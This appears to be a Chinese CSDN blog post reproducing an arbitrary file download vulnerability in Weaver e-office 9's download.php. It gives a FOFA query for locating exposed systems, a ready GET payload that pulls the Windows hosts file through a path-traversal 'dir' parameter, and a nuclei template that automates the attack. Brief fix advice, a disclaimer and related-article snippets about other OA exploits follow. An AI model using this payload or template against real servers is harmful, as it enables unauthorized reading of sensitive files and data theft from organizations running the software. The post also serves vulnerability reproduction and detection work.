泛微e-office download.php存在任意文件下载

最新推荐文章于 2025-05-15 13:32:11 发布
最新推荐文章于 2025-05-15 13:32:11 发布
阅读量546 收藏 5
点赞数 4
文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80115097/article/details/137102347
版权

0x01 应用介绍

泛微e-office系统是标准、易用、快速部署上线的专业协同OA软件,国内协同OA办公领域领导品牌,致力于为企业用户提供专业OA办公系统、移动OA应用等协同OA整体解决方案

0x02 影响版本及语法特征

泛微e-offcie9
fofa:app=”泛微-EOffice” && body=”您的浏览器处于弹出窗口阻止模式!建议您关闭”

0x03 漏洞复现

payload:/general/file_folder/file_new/neworedit/download.php?filename=hosts&dir=C:\Windows\System32\drivers\etc\
直接使用get请求拼接该payload即可下载目标主机hosts文件

图片

下载完成后打开文件查看

图片


下载服务器文件复现成功

nuclei

id: fanwei-E-Office-file-read
info:
  name: fanwei-E-Office-file-read
  author: fanwei-E-Office-file-read
  severity: critical
  tags: fanwei

http:
  - raw:
    - |
        GET /general/file_folder/file_new/neworedit/download.php?filename=hosts&dir=C:\Windows\System32\drivers\etc\ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "127.0.0.1"
      - type: status
        status:
          - 200

图片

修复建议

使用最新版本的应用

限制漏洞路径的访问

 声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。所有渗透都需获取授权

免费领取安全学习资料包!


渗透工具

技术文档、书籍

面试题

帮助你在面试中脱颖而出

视频

基础到进阶

环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等

应急响应笔记

学习路线

黑客大佬
关注
漏洞复现】-ecology-任意文件读取-ln.FileDownload
知黑而守白
07-15 523
协同管理应用平台e-cology是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台。E-Cology接口处存在文件读取漏洞,恶意攻击者可能利用该漏洞读取服务器上的敏感文件,例如客户记录、财务数据或源代码,导致数据泄露。
E-Office任意文件上传漏洞复现
0xSec
08-12 2937
E-Office是一款标准化的协同 OA 办公软件,协同办公产品系列成员之一,实行通用化产品设计,充分贴合企业管理需求,本着简洁易用、高效智能的原则,为企业快速打造移动化、无纸化、数字化的办公平台。e-office 9.5版本源文件/webservice/upload.php接口处存在任意文件上传漏洞,未经身份验证的恶意攻击者可以上传恶意文件,从而获取目标服务器的控制权限。
E-Office download.php 任意文件读取漏洞
CommputerMac的博客
10-21 611
E-Office是一款企业级的全流程办公自动化软件,它包括协同办公、文档管理、知识管理、工作流管理等多个模块,涵盖了企业日常工作中的各个环节。E-Office能够帮助企业实现全流程数字化、自动化,提高工作效率和管理质量,降低管理成本,为企业提供全面、高效、便捷的办公服务。该系统download.php存在任意文件下载漏洞,通过该漏洞攻击者可以下载服务上任意文件。burp发包读取host文件。
Goby 漏洞发布|E-office协同办公系统 download.php 文件 filename 参数文件读取漏洞
m0_46699477的博客
06-21 437
E-office协同办公系统是一款专业的办公软件,是面向小型企业或团队的工作平台。 E-office协同办公系统存在文件读取漏洞,攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
最新漏洞汇总----实时更新!!!_漏洞(2),系统学网络安全从零开始
erthre的博客
04-16 1054
app.name=“ e-cology 9.0 OA”
平台ecology8.0二进制文件流下载对接接口
weixin_40476233的博客
11-20 3287
第一种配置接口 一、先配置相关接口 配置接口名 <service> <name>InvoiceManagementPlatformService</name> <namespace>FL.action.workflow.interfaces.weaver.com.cn</namespace> <serviceClass>weaver.interfaces.workflow.action.FL.InvoiceManagement
E-Office sample权限绕过+文件上传组合漏洞Getshell
0xSec
11-28 1485
e-office 存在权限绕过漏洞(测试页面sample.php),攻击者可以通过此页面获取有效cookie绕过权限校验,利用后台文件上传漏洞上传后门文件获取服务器控制权限。
Web安全-相关系统-历史漏洞
csjsz的博客
07-01 5055
2019年 e-cology OA数据库配置信息泄漏 包括不限于8.0、9.0版本 /mobile/dbconfigreader.jsp 2019年 e-cology OA系统V8、V9版本SQL注入(暂未发现公开poc) 2019年 e-cology OA系统远程代码执行 0x02 影响范围 包括但不限于7.0,8.0,8.1 /weaver/bsh.servlet.BshServlet/ CNVD-2019-34241 /mobile/browser/WorkflowCenterT
红蓝对抗重点OA系统漏洞利用工具新年贺岁版V2.0,附工具下载链接。
白帽子黑客SuperherRo
09-22 681
红蓝对抗重点OA系统漏洞利用工具新年贺岁版V2.0的设计中旨是为了帮助各位师傅在渗透测试和挖洞中以及攻防演练中能够快速对OA系统进行快速定位进行漏洞检测和利用.,目前已实现20款OA系统的漏洞检测和利用,共133个漏洞.听说day一打一个准,也欢迎各位师傅补充漏洞和反馈误报,我们将积极作出调整和完善.已实现OA:通达、、万户、致远、用友、蓝凌、极限、红帆、华天、金蝶、金和、启莱、新点、信呼、一米、致翔、智明、宏景、广联达、易宝共20款OA系统漏洞检测和利用.支持单个或批量检测利用.
2024HVV在即| 最新漏洞CVE库(1.5W)与历史漏洞POC总结分享!
记录开发和安全学习过程中的点点滴滴
04-22 3195
也快到护网的时间了,每年的护网都是一场攻防实战的盛宴,那么漏洞库就是攻防红蓝双方人员的弹药库,红队人员可以通过工具进行监测是否存在历史漏洞方便快速打点,而蓝队则可以对资产进行梳理和监测历史漏洞,及时处理和修复,做好准备.
配置文件读取绝对路径_ebridge任意文件读取(实战trick)
weixin_42502643的博客
01-20 2133
漏洞简介 未授权任意文件读取,/wxjsapi/saveYZJFile接口获取filepath,输入文件路径->读取文件内容。返回数据包内出现了程序的绝对路径,攻击者可以通过返回内容识别程序运行路径从而下载数据库配置文件。 目录遍历+文件读取,我们能做的事情就很多了,比如读取管理员在桌面留下的密码文件、数据库配置文件、nginx代理配置、访问日志等。...
e-office download.php任意文件
zkaqlaoniao的博客
11-01 425
e-office系统是标准、易用、快速部署上线的专业协同OA软件,国内协同OA办公领域领导品牌,致力于为企业用户提供专业OA办公系统、移动OA应用等协同OA整体解决方案。
E Bridge 云桥任意文件读取
nnn2188185的博客
03-25 1519
云桥存在任意文件读取漏洞,攻击者成功利用该漏洞,可实现任意文件读取,获取敏感信息。
Linux高级
weixin_62345907的博客
09-01 2885
1、函数名( )命令表2、function 函数名( )命令表系统预先定义好的一些变量,可能有默认值可能没有RM 文件删除程序的名称,默认值为 rm -fCC C编译器的名称,默认值是ccCPP C预编译的名称,默认值:$(CC) -ECFLAGS C编译器的选项,无默认值OBJS 生成的二进制文件或者目标文件,自己定义的# 第二版本CC=gccCFLAGS=-c -g -Wall #-c编译 -g调试 -Wall显示警告clean:#define 宏名#ifdef 宏名。
OA云桥 未授权任意文件读取
qax
10-06 1896
0x00 漏洞描述 云桥(e-Bridge)是上海公司在”互联网+”的背景下研发的一款用于桥接互联网开放资源与企业信息化系统的系统集成中间件。云桥存在任意文件读取漏洞,攻击者成功利用该漏洞,可实现任意文件读取,获取敏感信息。 0x01 影响版本 2018-2019 多个版本。 0x02 漏洞复现 第一步:/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C:/&fileExt=txt,在返回包有id字符串 第
E-office OA 任意文件下载漏洞复现
afei001
01-09 1463
目录 1.漏洞概述 2.影响范围 3.漏洞等级 4.漏洞复现 5.漏洞分析 6.漏洞修复 1.漏洞概述 e-office公司面向中小型组织推出的OA产品,简单易用高效,部署快、投资少。提供免费试用体验。但e-office OA系统存在漏洞还真不少。这个任意文件下载漏洞之前在乌云上也爆出过了。由于配置文件/inc/attach.php中的ATTACHMENT_NAME参数未有效控制范围,导致任意文件下载...
calico排错思路
ss810540895的博客
05-15 938
定位问题范围:同节点/跨节点?是否涉及策略?验证基础环境:Pod IP 分配、节点状态、组件日志。检查路由与 BGPip route。分析网络策略:iptables/eBPF 规则、策略匹配逻辑。高级工具辅助:tcpdump、eBPF 工具链、WireGuard 诊断。参考文档Calico 官方排错指南。通过以上步骤,可覆盖 90% 的 Calico 网络问题。对于复杂场景(如多云混合网络),需结合具体底层网络拓扑分析。
WordPress_Relevanssi Sql注入漏洞复现(CVE-2025-4396)
iSee857的博客
05-15 87
Relevanssi – A Better Search plugin for WordPress 容易受到基于 时间的 SQL 注入,在特定版本中由于转义不足以及对现有 SQL 查询的准备不足。这使得未经身份验证的攻击者能够将其他 SQL 查询附加到现有查询中,这些查询可用于从数据库中提取敏感信息(CVE-2025-4396)
如何使用WordPress SEO检查器进行实时内容分析
最新发布
web_geek的博客
05-15 206
内容分析是SEO的核心部分,通过分析文章中的关键词密度、段落结构、可读性等因素,实时优化文章以确保它更具吸引力且对搜索引擎友好。你可以将内容分析理解为在驾驶过程中实时查看速度表与导航仪的结合,而SEO优化则是确保这辆车能以最优路径抵达目的地。SEO优化的目的是确保你的文章能在用户搜索相关主题时被搜索引擎推荐,这样才能吸引更多访问量。使用SEO检查工具,尤其是像AIOSEO这样功能强大的工具,可以帮助你在撰写内容时立即发现问题并进行优化。
E-Office-json_common.phpSQL注入漏洞
03-30
<think>好的,我现在需要处理用户关于E-Office中_common.php文件存在SQL注入漏洞的查询。首先,我要确认用户的需求:他们想知道修复方案和受影响的版本。根据用户提供的引用内容,我需要从这些引用中提取相关信息。 首先,查看用户提供的引用内容。引用[2]提到E-Office的多个接口存在SQL注入漏洞,包括json_common.php、flow_xml.php等,但用户询问的是_common.php,这里可能是一个笔误或者具体文件名的不同。引用[3]和[4]提到了json_common.php漏洞,可能用户提到的_common.php是相关文件。因此,需要假设用户可能指的是json_common.php,或者可能是其他类似的接口文件。 接下来,需要确定影响版本。引用[2]和[4]中提到影响范围,但具体版本号没有明确给出。通常,漏洞公告可能不会列出所有受影响版本,但可以建议用户检查是否在使用未修复的旧版本。引用[3]提到了检测脚本,可能适用于特定版本。 关于修复方案,引用[1]提到了整改意见,可能包括补丁更新、输入过滤等。引用[2]和[4]没有具体说明修复方法,但通常厂商会发布补丁。此外,参考通用SQL注入修复方法,如参数化查询、输入验证等,可以建议用户实施这些措施。 还需要注意用户提供的引用[5]是PHP代码审计的基础知识,可能帮助理解漏洞成因,但可能不直接提供修复方案。需要综合这些信息,给出合理的回答,同时指出引用来源。 最后,需要生成相关问题,帮助用户深入理解。例如,如何检测漏洞、其他相关漏洞、修复后的验证方法等。</think>关于E-Office系统中`_common.php`文件(推测应为`json_common.php`相关接口)存在的SQL注入漏洞,结合公开漏洞信息整理如下: ### 一、漏洞影响版本 根据引用[2][3][4],该漏洞影响E-Office系统中**未修复该漏洞的历史版本**。具体版本号需联系官方确认,但存在以下特征: - 使用未经过安全审计的旧版代码架构 - 未对`json_common.php`等接口实现输入过滤 - 未部署最新的安全补丁包 ### 二、漏洞修复方案 1. **官方补丁升级** 立即联系技术支持获取最新安全补丁包,更新受影响的组件(引用[1]中提到的整改建议)。 2. **代码层修复** 针对接口参数进行过滤加固: ```php // 示例:参数化查询改造(引用[5]) $param = mysqli_real_escape_string($conn, $_POST['user_input']); $sql = "SELECT * FROM users WHERE id = '{$param}'"; ``` 3. **输入过滤增强** 在`json_common.php`等漏洞接口处添加: ```php if (preg_match('/select|union|sleep|benchmark/i', $_REQUEST['param'])) { die("非法请求"); } ``` 4. **权限控制** 关闭接口的匿名访问权限,强制要求身份认证(引用[2]中强调未授权访问问题)。 ### 三、漏洞验证方法 可使用引用[3]提到的检测脚本进行安全评估: ```bash python json_commonSQLcheck.py -u http://目标地址:端口 ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值